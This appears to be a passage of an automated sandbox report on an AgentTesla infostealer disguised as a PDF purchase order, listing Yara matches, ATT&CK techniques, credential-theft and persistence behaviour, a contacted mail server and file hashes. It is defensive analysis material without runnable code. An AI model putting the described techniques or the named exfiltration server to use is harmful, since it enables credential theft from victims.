                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4344c70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.42a9970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.4024710.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.42a9970.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.4024710.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.3fa9990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4344c70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2231602205.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4457826484.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO-2024)bekotas.pdf.exe PID: 4440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PO-2024)bekotas.pdf.exe PID: 3452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 4332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 2472, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 6360, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4344c70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.42a9970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.4024710.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.42a9970.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.4024710.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.3fa9990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4344c70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO-2024)bekotas.pdf.exe PID: 4440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 4332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 2472, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		31
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		13
                    Obfuscated Files or Information                    		Security Account Manager211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object Model31
                    Input Capture                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Hidden Files and Directories                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466697 Sample: PO-2024)bekotas.pdf.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 39 mail.musabody.com 2->39 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 12 other signatures 2->55 8 PO-2024)bekotas.pdf.exe 4 2->8         started        12 ctsdvwT.exe 3 2->12         started        14 ctsdvwT.exe 2 2->14         started        signatures3 process4 file5 35 C:\Users\user\...\PO-2024)bekotas.pdf.exe.log, ASCII 8->35 dropped 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->57 59 Adds a directory exclusion to Windows Defender 8->59 61 Injects a PE file into a foreign processes 8->61 16 PO-2024)bekotas.pdf.exe 1 5 8->16         started        21 powershell.exe 7 8->21         started        63 Multi AV Scanner detection for dropped file 12->63 65 Machine Learning detection for dropped file 12->65 67 Contains functionality to register a low level keyboard hook 12->67 23 ctsdvwT.exe 2 12->23         started        25 ctsdvwT.exe 12->25         started        27 ctsdvwT.exe 2 14->27         started        signatures6 process7 dnsIp8 37 mail.musabody.com 108.167.140.123, 587, 64941 UNIFIEDLAYER-AS-1US United States 16->37 31 C:\Users\user\AppData\Roaming\...\ctsdvwT.exe, PE32 16->31 dropped 33 C:\Users\user\...\ctsdvwT.exe:Zone.Identifier, ASCII 16->33 dropped 41 Tries to steal Mail credentials (via file / registry access) 16->41 43 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->43 45 Installs a global keyboard hook 16->45 29 conhost.exe 21->29         started        47 Tries to harvest and steal browser information (history, passwords, etc) 27->47 file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    PO-2024)bekotas.pdf.exe24%ReversingLabs
                    PO-2024)bekotas.pdf.exe32%VirustotalBrowse
                    PO-2024)bekotas.pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe24%ReversingLabs
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe32%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.musabody.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://mail.musabody.com0%VirustotalBrowse
                    http://mail.musabody.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.musabody.com
                    		108.167.140.123
                    		truetrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://account.dyn.com/PO-2024)bekotas.pdf.exe, 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO-2024)bekotas.pdf.exe, 00000000.00000002.2014482605.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2165652730.000000000312D000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2250775704.0000000003447000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://mail.musabody.comPO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    108.167.140.123
                    		mail.musabody.comUnited States
                    		46606UNIFIEDLAYER-AS-1UStrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1466697
                    Start date and time:2024-07-03 09:47:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 47s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:14
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:PO-2024)bekotas.pdf.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@14/7@1/1
                    EGA Information:
                    • Successful, ratio: 83.3%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 524
                    • Number of non-executed functions: 9
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target ctsdvwT.exe, PID 4612 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    03:47:53API Interceptor9199387x Sleep call for process: PO-2024)bekotas.pdf.exe modified
                    03:48:08API Interceptor7407221x Sleep call for process: ctsdvwT.exe modified
                    09:47:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    09:48:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    108.167.140.123Price 10243975 Bekotas A.S scan.pdf.exeGet hashmaliciousAgentTeslaBrowse
                      DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exeGet hashmaliciousAgentTeslaBrowse
                        rRFQ_251477800TM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            rPO50018137-14_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                              62402781, Fiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                2024-19-2118fernas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  DHL Shipping DocumentTracking No Confirmation.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    Fiyat_teklifi_Istegi_23070_PER_120_Adet_#U2026scanneed_00101.pdf.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      mail.musabody.comPrice 10243975 Bekotas A.S scan.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 108.167.140.123
                                      DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exeGet hashmaliciousAgentTeslaBrowse
                                      • 108.167.140.123
                                      rRFQ_251477800TM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 108.167.140.123
                                      Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 108.167.140.123
                                      rPO50018137-14_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                      • 108.167.140.123
                                      62402781, Fiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                      • 108.167.140.123
                                      2024-19-2118fernas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 108.167.140.123
                                      DHL Shipping DocumentTracking No Confirmation.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 108.167.140.123
                                      Fiyat_teklifi_Istegi_23070_PER_120_Adet_#U2026scanneed_00101.pdf.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 108.167.140.123

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      UNIFIEDLAYER-AS-1UShttps://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuITGet hashmaliciousHTMLPhisherBrowse
                                      • 162.241.62.33
                                      DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
                                      • 192.185.89.92
                                      AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      • 192.185.143.105
                                      Att00173994.exeGet hashmaliciousFormBookBrowse
                                      • 162.240.81.18
                                      457525.xlsGet hashmaliciousUnknownBrowse
                                      • 192.185.89.92
                                      457525.xlsGet hashmaliciousUnknownBrowse
                                      • 192.185.89.92
                                      457525.xlsGet hashmaliciousUnknownBrowse
                                      • 192.185.89.92
                                      457525.xlsGet hashmaliciousUnknownBrowse
                                      • 192.185.89.92
                                      Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
                                      • 192.185.89.92
                                      https://gilbertnow.com/lscache/?initiate=kZwivKCdReGfjYUlVXF2v3UdvZ9rRqUivHGet hashmaliciousUnknownBrowse
                                      • 192.185.91.211

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-2024)bekotas.pdf.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ctsdvwT.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.7307872139132228
                                      Encrypted:false
                                      SSDEEP:3:NlllulF/lll:NllUF/ll
                                      MD5:3ECB05F56210644B241FF459B861D309
                                      SHA1:1A33420F5866C42A5ED3CFF0DD505451FBFA8072
                                      SHA-256:712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
                                      SHA-512:79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e.................................^.........................

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0m3rxyww.oxh.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofioamqc.yga.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):959488
                                      Entropy (8bit):7.9475757386482515
                                      Encrypted:false
                                      SSDEEP:24576:cca028CkoVwvyTIv+WSLFhnfksXOQcFez3aqmUY:cb3XwKTIv+TFRfksXvTY
                                      MD5:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      SHA1:7B7B425DF447FB64ABFBF7FE34D336B13D8D8BB0
                                      SHA-256:72629B026D1626923F7D3280D0DABB7C1A9EE869B7CE9EC2F02C949544C8326F
                                      SHA-512:0560B84DA47F73C13D9EE9762F1B53E88E4A87C7154E5203DBDAFC50C18D502EAAA40A54DAD91F0AA2164BCDBE16AA2B5D3BD97F1C8F3AE7C7E871067E04615A
